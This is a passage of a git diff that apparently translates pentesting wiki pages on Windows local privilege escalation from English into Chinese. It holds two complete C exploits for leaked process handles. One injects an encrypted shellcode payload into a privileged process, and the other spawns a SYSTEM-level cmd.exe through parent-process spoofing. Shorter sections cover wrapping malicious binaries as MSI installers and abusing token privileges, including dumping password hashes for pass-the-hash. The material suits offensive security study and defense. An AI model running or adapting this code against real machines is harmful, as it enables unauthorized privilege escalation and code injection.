+LPVOID pRemoteCode = NULL;
+HANDLE hThread = NULL;
+BOOL bStatus = FALSE;
 
-	pVirtualAllocEx = GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAllocEx");
-	pWriteProcessMemory = GetProcAddress(GetModuleHandle("kernel32.dll"), "WriteProcessMemory");
-	pRtlCreateUserThread = GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlCreateUserThread");
+pVirtualAllocEx = GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAllocEx");
+pWriteProcessMemory = GetProcAddress(GetModuleHandle("kernel32.dll"), "WriteProcessMemory");
+pRtlCreateUserThread = GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlCreateUserThread");
 
-	pRemoteCode = pVirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);
-	pWriteProcessMemory(hProc, pRemoteCode, (PVOID)payload, (SIZE_T)payload_len, (SIZE_T *)NULL);
+pRemoteCode = pVirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);
+pWriteProcessMemory(hProc, pRemoteCode, (PVOID)payload, (SIZE_T)payload_len, (SIZE_T *)NULL);
 
-    bStatus = (BOOL) pRtlCreateUserThread(hProc, NULL, 0, 0, 0, 0, pRemoteCode, NULL, &hThread, NULL);
-	if (bStatus != FALSE) {
-			WaitForSingleObject(hThread, -1);
-			CloseHandle(hThread);
-			return 0;
-	}
-	else
-		return -1;
+bStatus = (BOOL) pRtlCreateUserThread(hProc, NULL, 0, 0, 0, 0, pRemoteCode, NULL, &hThread, NULL);
+if (bStatus != FALSE) {
+WaitForSingleObject(hThread, -1);
+CloseHandle(hThread);
+return 0;
+}
+else
+return -1;
 }
 
 int main(int argc, char **argv) {
 
-	int pid = 0;
-	HANDLE hProc = NULL;
+int pid = 0;
+HANDLE hProc = NULL;
 
-	// AES encrypted shellcode spawning notepad.exe (ExitThread)
-	char key[] = { 0x49, 0xbc, 0xa5, 0x1d, 0xa7, 0x3d, 0xd6, 0x0, 0xee, 0x2, 0x29, 0x3e, 0x9b, 0xb2, 0x8a, 0x69 };
-	unsigned char payload[] = { 0x6b, 0x98, 0xe8, 0x38, 0xaf, 0x82, 0xdc, 0xd4, 0xda, 0x57, 0x15, 0x48, 0x2f, 0xf0, 0x4e, 0xd3, 0x1a, 0x70, 0x6d, 0xbf, 0x53, 0xa8, 0xcb, 0xbb, 0xbb, 0x38, 0xf6, 0x4e, 0xee, 0x84, 0x36, 0xe5, 0x25, 0x76, 0xce, 0xb0, 0xf6, 0x39, 0x22, 0x76, 0x36, 0x3c, 0xe1, 0x13, 0x18, 0x9d, 0xb1, 0x6e, 0x0, 0x55, 0x8a, 0x4f, 0xb8, 0x2d, 0xe7, 0x6f, 0x91, 0xa8, 0x79, 0x4e, 0x34, 0x88, 0x24, 0x61, 0xa4, 0xcf, 0x70, 0xdb, 0xef, 0x25, 0x96, 0x65, 0x76, 0x7, 0xe7, 0x53, 0x9, 0xbf, 0x2d, 0x92, 0x25, 0x4e, 0x30, 0xa, 0xe7, 0x69, 0xaf, 0xf7, 0x32, 0xa6, 0x98, 0xd3, 0xbe, 0x2b, 0x8, 0x90, 0x0, 0x9e, 0x3f, 0x58, 0xed, 0x21, 0x69, 0xcb, 0x38, 0x5d, 0x5e, 0x68, 0x5e, 0xb9, 0xd6, 0xc5, 0x92, 0xd1, 0xaf, 0xa2, 0x5d, 0x16, 0x23, 0x48, 0xbc, 0xdd, 0x2a, 0x9f, 0x3c, 0x22, 0xdb, 0x19, 0x24, 0xdf, 0x86, 0x4a, 0xa2, 0xa0, 0x8f, 0x1a, 0xe, 0xd6, 0xb7, 0xd2, 0x6c, 0x6d, 0x90, 0x55, 0x3e, 0x7d, 0x9b, 0x69, 0x87, 0xad, 0xd7, 0x5c, 0xf3, 0x1, 0x7c, 0x93, 0x1d, 0xaa, 0x40, 0xf, 0x15, 0x48, 0x5b, 0xad, 0x6, 0xb5, 0xe5, 0xb9, 0x92, 0xae, 0x9b, 0xdb, 0x9a, 0x9b, 0x4e, 0x44, 0x45, 0xdb, 0x9f, 0x28, 0x90, 0x9e, 0x63, 0x23, 0xf2, 0xca, 0xab, 0xa7, 0x68, 0xbc, 0x31, 0xb4, 0xf9, 0xbb, 0x73, 0xd4, 0x56, 0x94, 0x2c, 0x63, 0x47, 0x21, 0x84, 0xa2, 0xb6, 0x91, 0x23, 0x8f, 0xa0, 0x46, 0x76, 0xff, 0x3f, 0x75, 0xd, 0x51, 0xc5, 0x70, 0x26, 0x1, 0xcf, 0x23, 0xbf, 0x97, 0xb2, 0x8d, 0x66, 0x35, 0xc8, 0xe3, 0x2, 0xf6, 0xbd, 0x44, 0x83, 0xf2, 0x80, 0x4c, 0xd0, 0x7d, 0xa3, 0xbd, 0x33, 0x8e, 0xe8, 0x6, 0xbc, 0xdc, 0xff, 0xe0, 0x96, 0xd9, 0xdc, 0x87, 0x2a, 0x81, 0xf3, 0x53, 0x37, 0x16, 0x3a, 0xcc, 0x3c, 0x34, 0x4, 0x9c, 0xc6, 0xbb, 0x12, 0x72, 0xf3, 0xa3, 0x94, 0x5d, 0x19, 0x43, 0x56, 0xa8, 0xba, 0x2a, 0x1d, 0x12, 0xeb, 0xd2, 0x6e, 0x79, 0x65, 0x2a };
-	unsigned int payload_len = sizeof(payload);
+// AES encrypted shellcode spawning notepad.exe (ExitThread)
+char key[] = { 0x49, 0xbc, 0xa5, 0x1d, 0xa7, 0x3d, 0xd6, 0x0, 0xee, 0x2, 0x29, 0x3e, 0x9b, 0xb2, 0x8a, 0x69 };
+unsigned char payload[] = { 0x6b, 0x98, 0xe8, 0x38, 0xaf, 0x82, 0xdc, 0xd4, 0xda, 0x57, 0x15, 0x48, 0x2f, 0xf0, 0x4e, 0xd3, 0x1a, 0x70, 0x6d, 0xbf, 0x53, 0xa8, 0xcb, 0xbb, 0xbb, 0x38, 0xf6, 0x4e, 0xee, 0x84, 0x36, 0xe5, 0x25, 0x76, 0xce, 0xb0, 0xf6, 0x39, 0x22, 0x76, 0x36, 0x3c, 0xe1, 0x13, 0x18, 0x9d, 0xb1, 0x6e, 0x0, 0x55, 0x8a, 0x4f, 0xb8, 0x2d, 0xe7, 0x6f, 0x91, 0xa8, 0x79, 0x4e, 0x34, 0x88, 0x24, 0x61, 0xa4, 0xcf, 0x70, 0xdb, 0xef, 0x25, 0x96, 0x65, 0x76, 0x7, 0xe7, 0x53, 0x9, 0xbf, 0x2d, 0x92, 0x25, 0x4e, 0x30, 0xa, 0xe7, 0x69, 0xaf, 0xf7, 0x32, 0xa6, 0x98, 0xd3, 0xbe, 0x2b, 0x8, 0x90, 0x0, 0x9e, 0x3f, 0x58, 0xed, 0x21, 0x69, 0xcb, 0x38, 0x5d, 0x5e, 0x68, 0x5e, 0xb9, 0xd6, 0xc5, 0x92, 0xd1, 0xaf, 0xa2, 0x5d, 0x16, 0x23, 0x48, 0xbc, 0xdd, 0x2a, 0x9f, 0x3c, 0x22, 0xdb, 0x19, 0x24, 0xdf, 0x86, 0x4a, 0xa2, 0xa0, 0x8f, 0x1a, 0xe, 0xd6, 0xb7, 0xd2, 0x6c, 0x6d, 0x90, 0x55, 0x3e, 0x7d, 0x9b, 0x69, 0x87, 0xad, 0xd7, 0x5c, 0xf3, 0x1, 0x7c, 0x93, 0x1d, 0xaa, 0x40, 0xf, 0x15, 0x48, 0x5b, 0xad, 0x6, 0xb5, 0xe5, 0xb9, 0x92, 0xae, 0x9b, 0xdb, 0x9a, 0x9b, 0x4e, 0x44, 0x45, 0xdb, 0x9f, 0x28, 0x90, 0x9e, 0x63, 0x23, 0xf2, 0xca, 0xab, 0xa7, 0x68, 0xbc, 0x31, 0xb4, 0xf9, 0xbb, 0x73, 0xd4, 0x56, 0x94, 0x2c, 0x63, 0x47, 0x21, 0x84, 0xa2, 0xb6, 0x91, 0x23, 0x8f, 0xa0, 0x46, 0x76, 0xff, 0x3f, 0x75, 0xd, 0x51, 0xc5, 0x70, 0x26, 0x1, 0xcf, 0x23, 0xbf, 0x97, 0xb2, 0x8d, 0x66, 0x35, 0xc8, 0xe3, 0x2, 0xf6, 0xbd, 0x44, 0x83, 0xf2, 0x80, 0x4c, 0xd0, 0x7d, 0xa3, 0xbd, 0x33, 0x8e, 0xe8, 0x6, 0xbc, 0xdc, 0xff, 0xe0, 0x96, 0xd9, 0xdc, 0x87, 0x2a, 0x81, 0xf3, 0x53, 0x37, 0x16, 0x3a, 0xcc, 0x3c, 0x34, 0x4, 0x9c, 0xc6, 0xbb, 0x12, 0x72, 0xf3, 0xa3, 0x94, 0x5d, 0x19, 0x43, 0x56, 0xa8, 0xba, 0x2a, 0x1d, 0x12, 0xeb, 0xd2, 0x6e, 0x79, 0x65, 0x2a };
+unsigned int payload_len = sizeof(payload);
 
-	printf("My PID: %d\n", GetCurrentProcessId());
-	getchar();
+printf("My PID: %d\n", GetCurrentProcessId());
+getchar();
 
-	// find a leaked handle to a process
-	hProc = GetVulnProcHandle();
+// find a leaked handle to a process
+hProc = GetVulnProcHandle();
 
-	if ( hProc != NULL) {
+if ( hProc != NULL) {
 
-		// d#Decrypt payload
-		AESDecrypt((char *) payload, payload_len, key, sizeof(key));
-		printf("[+] Sending gift...");
-		// Inject and run the payload in the privileged context
-		Inject(hProc, payload, payload_len);
-		printf("done.\n");
-	}
-	getchar();
+// d#Decrypt payload
+AESDecrypt((char *) payload, payload_len, key, sizeof(key));
+printf("[+] Sending gift...");
+// Inject and run the payload in the privileged context
+Inject(hProc, payload, payload_len);
+printf("done.\n");
+}
+getchar();
 
-    return 0;
+return 0;
 }
 ```
-
 ### Exploit Example 2
 
 > [!NOTE]
-> In a real scenario you probably **won't be able to control the binary** that is going to be executed by the vulnerable code (_C:\users\username\desktop\client.exe_ in this case). Probably you will **compromise a process and you will need to look if you can access any vulnerable handle of any privileged process**.
+> 在实际场景中，您可能**无法控制将由易受攻击的代码执行的二进制文件**（在这种情况下为 _C:\users\username\desktop\client.exe_）。您可能会**妥协一个进程，并需要查看是否可以访问任何特权进程的易受攻击句柄**。
 
-In this example, **instead of abusing the open handle to inject** and execute a shellcode, it's going to be **used the token of the privileged open handle process to create a new one**. This is done in lines from 138 to 148.
-
-Note how the **function `UpdateProcThreadAttribute`** is used with the **attribute `PROC_THREAD_ATTRIBUTE_PARENT_PROCESS` and the handle to the open privileged process**. This means that the **created process thread executing \_cmd.exe**\_\*\* will have the same token privilege as the open handle process\*\*.
+在这个例子中，**不是滥用打开的句柄来注入**和执行 shellcode，而是**使用特权打开句柄进程的令牌来创建一个新的进程**。这在第 138 行到第 148 行完成。
 
+注意**函数 `UpdateProcThreadAttribute`**是如何与**属性 `PROC_THREAD_ATTRIBUTE_PARENT_PROCESS` 和打开的特权进程的句柄**一起使用的。这意味着**创建的进程线程执行 \_cmd.exe**\_\*\*将具有与打开句柄进程相同的令牌权限\*\*。
 ```c
 #include <windows.h>
 #include <stdio.h>
@@ -531,164 +526,162 @@ Note how the **function `UpdateProcThreadAttribute`** is used with the **attribu
 
 HANDLE GetVulnProcHandle(void) {
 
-	ULONG handleInfoSize = 0x10000;
-    NTSTATUS status;
-    PSYSTEM_HANDLE_INFORMATION phHandleInfo = (PSYSTEM_HANDLE_INFORMATION) malloc(handleInfoSize);
-	HANDLE hProc = NULL;
-	POBJECT_TYPE_INFORMATION objectTypeInfo;
-	PVOID objectNameInfo;
-	UNICODE_STRING objectName;
-    ULONG returnLength;
-    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
-    DWORD dwOwnPID = GetCurrentProcessId();
+ULONG handleInfoSize = 0x10000;
+NTSTATUS status;
+PSYSTEM_HANDLE_INFORMATION phHandleInfo = (PSYSTEM_HANDLE_INFORMATION) malloc(handleInfoSize);
+HANDLE hProc = NULL;
+POBJECT_TYPE_INFORMATION objectTypeInfo;
+PVOID objectNameInfo;
+UNICODE_STRING objectName;
+ULONG returnLength;
+HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
+DWORD dwOwnPID = GetCurrentProcessId();
 
-    pNtQuerySystemInformation = GetProcAddress(hNtdll, "NtQuerySystemInformation");
-    pNtDuplicateObject = GetProcAddress(hNtdll, "NtDuplicateObject");
-    pNtQueryObject = GetProcAddress(hNtdll, "NtQueryObject");
-    pRtlEqualUnicodeString = GetProcAddress(hNtdll, "RtlEqualUnicodeString");
-    pRtlInitUnicodeString = GetProcAddress(hNtdll, "RtlInitUnicodeString");
+pNtQuerySystemInformation = GetProcAddress(hNtdll, "NtQuerySystemInformation");
+pNtDuplicateObject = GetProcAddress(hNtdll, "NtDuplicateObject");
+pNtQueryObject = GetProcAddress(hNtdll, "NtQueryObject");
+pRtlEqualUnicodeString = GetProcAddress(hNtdll, "RtlEqualUnicodeString");
+pRtlInitUnicodeString = GetProcAddress(hNtdll, "RtlInitUnicodeString");
 
-    printf("[+] Grabbing handles...");
+printf("[+] Grabbing handles...");
 
-    while ((status = pNtQuerySystemInformation( SystemHandleInformation, phHandleInfo, handleInfoSize,
-											NULL )) == STATUS_INFO_LENGTH_MISMATCH)
-        phHandleInfo = (PSYSTEM_HANDLE_INFORMATION) realloc(phHandleInfo, handleInfoSize *= 2);
+while ((status = pNtQuerySystemInformation( SystemHandleInformation, phHandleInfo, handleInfoSize,
+NULL )) == STATUS_INFO_LENGTH_MISMATCH)
+phHandleInfo = (PSYSTEM_HANDLE_INFORMATION) realloc(phHandleInfo, handleInfoSize *= 2);
 
-    if (status != STATUS_SUCCESS)
-    {
-        printf("[!] NtQuerySystemInformation failed!\n");
-        return 0;
-    }
+if (status != STATUS_SUCCESS)
+{
+printf("[!] NtQuerySystemInformation failed!\n");
+return 0;
+}
 
-    printf("done.\n[+] Fetched %d handles.\n", phHandleInfo->NumberOfHandles);
+printf("done.\n[+] Fetched %d handles.\n", phHandleInfo->NumberOfHandles);
 
-    // iterate handles until we find the privileged process handle
-    for (int i = 0; i < phHandleInfo->NumberOfHandles; ++i)
-    {
-        SYSTEM_HANDLE_TABLE_ENTRY_INFO handle = phHandleInfo->Handles[i];
+// iterate handles until we find the privileged process handle
+for (int i = 0; i < phHandleInfo->NumberOfHandles; ++i)
+{
+SYSTEM_HANDLE_TABLE_ENTRY_INFO handle = phHandleInfo->Handles[i];
 
-        // Check if this handle belongs to our own process
-        if (handle.UniqueProcessId != dwOwnPID)
-            continue;
+// Check if this handle belongs to our own process
+if (handle.UniqueProcessId != dwOwnPID)
+continue;
 
-        objectTypeInfo = (POBJECT_TYPE_INFORMATION) malloc(0x1000);
-        if (pNtQueryObject( (HANDLE) handle.HandleValue,
-						ObjectTypeInformation,
-						objectTypeInfo,
-						0x1000,
-						NULL ) != STATUS_SUCCESS)
-            continue;
+objectTypeInfo = (POBJECT_TYPE_INFORMATION) malloc(0x1000);
+if (pNtQueryObject( (HANDLE) handle.HandleValue,
+ObjectTypeInformation,
+objectTypeInfo,
+0x1000,
+NULL ) != STATUS_SUCCESS)
+continue;
 
-		// skip some objects to avoid getting stuck
-		// see: https://github.com/adamdriscoll/PoshInternals/issues/7
-        if (handle.GrantedAccess == 0x0012019f
-			&& handle.GrantedAccess != 0x00120189
-			&& handle.GrantedAccess != 0x120089
-			&& handle.GrantedAccess != 0x1A019F ) {
-            free(objectTypeInfo);
-            continue;
-        }
+// skip some objects to avoid getting stuck
+// see: https://github.com/adamdriscoll/PoshInternals/issues/7
+if (handle.GrantedAccess == 0x0012019f
+&& handle.GrantedAccess != 0x00120189
+&& handle.GrantedAccess != 0x120089
+&& handle.GrantedAccess != 0x1A019F ) {
+free(objectTypeInfo);
+continue;
+}
 
-		// get object name information
-        objectNameInfo = malloc(0x1000);
-        if (pNtQueryObject( (HANDLE) handle.HandleValue,
-						ObjectNameInformation,
-						objectNameInfo,
-						0x1000,
-						&returnLength ) != STATUS_SUCCESS) {
+// get object name information
+objectNameInfo = malloc(0x1000);
+if (pNtQueryObject( (HANDLE) handle.HandleValue,
+ObjectNameInformation,
+objectNameInfo,
+0x1000,
+&returnLength ) != STATUS_SUCCESS) {
 
-			// adjust the size of a returned object and query again
-			objectNameInfo = realloc(objectNameInfo, returnLength);
-            if (pNtQueryObject( (HANDLE) handle.HandleValue,
-							ObjectNameInformation,
-							objectNameInfo,
-							returnLength,
-							NULL ) != STATUS_SUCCESS) {
-                free(objectTypeInfo);
-                free(objectNameInfo);
-                continue;
-            }
-        }
+// adjust the size of a returned object and query again
+objectNameInfo = realloc(objectNameInfo, returnLength);
+if (pNtQueryObject( (HANDLE) handle.HandleValue,
+ObjectNameInformation,
+objectNameInfo,
+returnLength,
+NULL ) != STATUS_SUCCESS) {
+free(objectTypeInfo);
+free(objectNameInfo);
+continue;
+}
+}
 
-        // check if we've got a process object
-        objectName = *(PUNICODE_STRING) objectNameInfo;
-        UNICODE_STRING pProcess;
+// check if we've got a process object
+objectName = *(PUNICODE_STRING) objectNameInfo;
+UNICODE_STRING pProcess;
 
-        pRtlInitUnicodeString(&pProcess, L"Process");
-        if (pRtlEqualUnicodeString(&objectTypeInfo->TypeName, &pProcess, TRUE)) {
-            printf("[+] Found process handle (%x)\n", handle.HandleValue);
-            hProc = (HANDLE) handle.HandleValue;
-			free(objectTypeInfo);
-			free(objectNameInfo);
-			break;
-        }
-        else
-            continue;
+pRtlInitUnicodeString(&pProcess, L"Process");
+if (pRtlEqualUnicodeString(&objectTypeInfo->TypeName, &pProcess, TRUE)) {
+printf("[+] Found process handle (%x)\n", handle.HandleValue);
+hProc = (HANDLE) handle.HandleValue;
+free(objectTypeInfo);
+free(objectNameInfo);
+break;
+}
+else
+continue;
 
-        free(objectTypeInfo);
-        free(objectNameInfo);
-    }
+free(objectTypeInfo);
+free(objectNameInfo);
+}
 
-	return hProc;
+return hProc;
 }
 
 
 int main(int argc, char **argv) {
 
-	HANDLE hProc = NULL;
-    STARTUPINFOEXA si;
-    PROCESS_INFORMATION pi;
-	int pid = 0;
-	SIZE_T size;
-	BOOL ret;
+HANDLE hProc = NULL;
+STARTUPINFOEXA si;
+PROCESS_INFORMATION pi;
+int pid = 0;
+SIZE_T size;
+BOOL ret;
 
-	Sleep(20000);
-	// find leaked process handle
-	hProc = GetVulnProcHandle();
+Sleep(20000);
+// find leaked process handle
+hProc = GetVulnProcHandle();
 
-	if ( hProc != NULL) {
+if ( hProc != NULL) {
 
-		// Adjust proess attributes with PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
-		ZeroMemory(&si, sizeof(STARTUPINFOEXA));
+// Adjust proess attributes with PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
+ZeroMemory(&si, sizeof(STARTUPINFOEXA));
 
-		InitializeProcThreadAttributeList(NULL, 1, 0, &size);
-		si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST) HeapAlloc( GetProcessHeap(), 0, size );
+InitializeProcThreadAttributeList(NULL, 1, 0, &size);
+si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST) HeapAlloc( GetProcessHeap(), 0, size );
 
-		InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size);
-		UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hProc, sizeof(HANDLE), NULL, NULL);
+InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size);
+UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hProc, sizeof(HANDLE), NULL, NULL);
 
-		si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
+si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
 
-		// Spawn elevated cmd process
-		ret = CreateProcessA( "C:\\Windows\\system32\\cmd.exe", NULL, NULL, NULL, TRUE,
-			EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOA)(&si), &pi );
+// Spawn elevated cmd process
+ret = CreateProcessA( "C:\\Windows\\system32\\cmd.exe", NULL, NULL, NULL, TRUE,
+EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOA)(&si), &pi );
 
-		if (ret == FALSE) {
-			printf("[!] Error spawning new process: [%d]\n", GetLastError());
-			return -1;
-		}
-	}
+if (ret == FALSE) {
+printf("[!] Error spawning new process: [%d]\n", GetLastError());
+return -1;
+}
+}
 
-	Sleep(20000);
-    return 0;
+Sleep(20000);
+return 0;
 }
 ```
-
-## Other tools and examples
+## 其他工具和示例
 
 - [**https://github.com/lab52io/LeakedHandlesFinder**](https://github.com/lab52io/LeakedHandlesFinder)
 
-This tool allows you to monitor leaked handles to find vulnerable ones and even auto-exploit them. It also has a tool to leak one.
+该工具允许您监控泄漏的句柄，以找到易受攻击的句柄，甚至可以自动利用它们。它还提供了一个泄漏句柄的工具。
 
 - [**https://github.com/abankalarm/ReHacks/tree/main/Leaky%20Handles**](https://github.com/abankalarm/ReHacks/tree/main/Leaky%20Handles)
 
-Another tool to leak a handle and exploit it.
+另一个泄漏句柄并利用它的工具。
 
-## References
+## 参考文献
 
 - [http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/)
 - [https://github.com/lab52io/LeakedHandlesFinder](https://github.com/lab52io/LeakedHandlesFinder)
 - [https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html](https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md b/src/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md
index 259f6b6f5..af5ece188 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md
@@ -2,12 +2,12 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-Download the free version app from [https://www.exemsi.com/documentation/getting-started/](https://www.exemsi.com/download/), execute it and wrap the "malicious" binary on it.\
-Note that you can wrap a "**.bat**" if you **just** want to **execute** **command lines (instead of cmd.exe select the .bat file)**
+从 [https://www.exemsi.com/documentation/getting-started/](https://www.exemsi.com/download/) 下载免费版本的应用程序，执行它并将“恶意”二进制文件包装在其中。\
+请注意，如果您**只**想**执行** **命令行（而不是选择 cmd.exe，选择 .bat 文件）**，您可以包装一个“**.bat**”文件。
 
 ![](<../../images/image (417).png>)
 
-And this is the most important part of the configuration:
+这是配置中最重要的部分：
 
 ![](<../../images/image (312).png>)
 
@@ -15,9 +15,8 @@ And this is the most important part of the configuration:
 
 ![](<../../images/image (1072).png>)
 
-(Please, note that if you try to pack your own binary you will be able to modify these values)
+（请注意，如果您尝试打包自己的二进制文件，您将能够修改这些值）
 
-From here just click on **next buttons** and the last **build button and your installer/wrapper will be generated.**
+从这里开始，只需点击**下一步按钮**和最后的**构建按钮，您的安装程序/包装器将被生成。**
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.md b/src/windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.md
index 76b843a24..0878c4118 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.md
@@ -1,10 +1,9 @@
-# Named Pipe Client Impersonation
+# 命名管道客户端 impersonation
 
-## Named Pipe Client Impersonation
+## 命名管道客户端 impersonation
 
 {{#include ../../banners/hacktricks-training.md}}
 
-Check: [**https://ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation**](https://ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation)
+检查: [**https://ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation**](https://ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md
index faf1557bc..1a475d941 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md
@@ -1,20 +1,20 @@
-# Abusing Tokens
+# 滥用令牌
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Tokens
+## 令牌
 
-If you **don't know what are Windows Access Tokens** read this page before continuing:
+如果你**不知道什么是Windows访问令牌**，请在继续之前阅读此页面：
 
 {{#ref}}
 access-tokens.md
 {{#endref}}
 
-**Maybe you could be able to escalate privileges abusing the tokens you already have**
+**也许你可以通过滥用你已经拥有的令牌来提升权限**
 
 ### SeImpersonatePrivilege
 
-This is privilege that is held by any process allows the impersonation (but not creation) of any token, given that a handle to it can be obtained. A privileged token can be acquired from a Windows service (DCOM) by inducing it to perform NTLM authentication against an exploit, subsequently enabling the execution of a process with SYSTEM privileges. This vulnerability can be exploited using various tools, such as [juicy-potato](https://github.com/ohpe/juicy-potato), [RogueWinRM](https://github.com/antonioCoco/RogueWinRM) (which requires winrm to be disabled), [SweetPotato](https://github.com/CCob/SweetPotato), and [PrintSpoofer](https://github.com/itm4n/PrintSpoofer).
+这是任何进程持有的特权，允许对任何令牌进行 impersonation（但不允许创建），前提是可以获得其句柄。可以通过诱使Windows服务（DCOM）对一个漏洞进行NTLM身份验证来获取特权令牌，从而启用以SYSTEM权限执行进程。可以使用各种工具利用此漏洞，例如 [juicy-potato](https://github.com/ohpe/juicy-potato)、[RogueWinRM](https://github.com/antonioCoco/RogueWinRM)（需要禁用winrm）、[SweetPotato](https://github.com/CCob/SweetPotato) 和 [PrintSpoofer](https://github.com/itm4n/PrintSpoofer)。
 
 {{#ref}}
 roguepotato-and-printspoofer.md
@@ -26,23 +26,23 @@ juicypotato.md
 
 ### SeAssignPrimaryPrivilege
 
-It is very similar to **SeImpersonatePrivilege**, it will use the **same method** to get a privileged token.\
-Then, this privilege allows **to assign a primary token** to a new/suspended process. With the privileged impersonation token you can derivate a primary token (DuplicateTokenEx).\
-With the token, you can create a **new process** with 'CreateProcessAsUser' or create a process suspended and **set the token** (in general, you cannot modify the primary token of a running process).
+它与**SeImpersonatePrivilege**非常相似，将使用**相同的方法**来获取特权令牌。\
+然后，此特权允许**将主令牌分配**给新的/挂起的进程。使用特权的impersonation令牌可以派生出主令牌（DuplicateTokenEx）。\
+使用该令牌，可以使用'CreateProcessAsUser'创建**新进程**，或创建一个挂起的进程并**设置令牌**（通常，无法修改正在运行的进程的主令牌）。
 
 ### SeTcbPrivilege
 
-If you have enabled this token you can use **KERB_S4U_LOGON** to get an **impersonation token** for any other user without knowing the credentials, **add an arbitrary group** (admins) to the token, set the **integrity level** of the token to "**medium**", and assign this token to the **current thread** (SetThreadToken).
+如果你启用了此令牌，可以使用**KERB_S4U_LOGON**为任何其他用户获取**impersonation令牌**而无需知道凭据，**向令牌添加任意组**（管理员），将令牌的**完整性级别**设置为“**中等**”，并将此令牌分配给**当前线程**（SetThreadToken）。
 
 ### SeBackupPrivilege
 
-The system is caused to **grant all read access** control to any file (limited to read operations) by this privilege. It is utilized for **reading the password hashes of local Administrator** accounts from the registry, following which, tools like "**psexec**" or "**wmiexec**" can be used with the hash (Pass-the-Hash technique). However, this technique fails under two conditions: when the Local Administrator account is disabled, or when a policy is in place that removes administrative rights from Local Administrators connecting remotely.\
-You can **abuse this privilege** with:
+此特权使系统**授予对任何文件的所有读取访问**控制（仅限读取操作）。它用于**从注册表中读取本地管理员**帐户的密码哈希，随后可以使用“**psexec**”或“**wmiexec**”与哈希一起使用（Pass-the-Hash技术）。但是，在两种情况下，此技术会失败：当本地管理员帐户被禁用，或当有政策规定从远程连接的本地管理员中删除管理权限时。\
+你可以通过以下方式**滥用此特权**：
 
 - [https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1](https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1)
 - [https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug](https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug)
-- following **IppSec** in [https://www.youtube.com/watch?v=IfCysW0Od8w\&t=2610\&ab_channel=IppSec](https://www.youtube.com/watch?v=IfCysW0Od8w&t=2610&ab_channel=IppSec)
-- Or as explained in the **escalating privileges with Backup Operators** section of:
+- 关注**IppSec**在 [https://www.youtube.com/watch?v=IfCysW0Od8w\&t=2610\&ab_channel=IppSec](https://www.youtube.com/watch?v=IfCysW0Od8w&t=2610&ab_channel=IppSec)
+- 或如在以下内容中解释的**通过备份操作员提升权限**部分：
 
 {{#ref}}
 ../active-directory-methodology/privileged-groups-and-token-privileges.md
@@ -50,34 +50,33 @@ You can **abuse this privilege** with:
 
 ### SeRestorePrivilege
 
-Permission for **write access** to any system file, irrespective of the file's Access Control List (ACL), is provided by this privilege. It opens up numerous possibilities for escalation, including the ability to **modify services**, perform DLL Hijacking, and set **debuggers** via Image File Execution Options among various other techniques.
+此特权提供对任何系统文件的**写访问**权限，无论文件的访问控制列表（ACL）如何。它为提升权限打开了许多可能性，包括**修改服务**、执行DLL劫持和通过图像文件执行选项设置**调试器**等各种其他技术。
 
 ### SeCreateTokenPrivilege
 
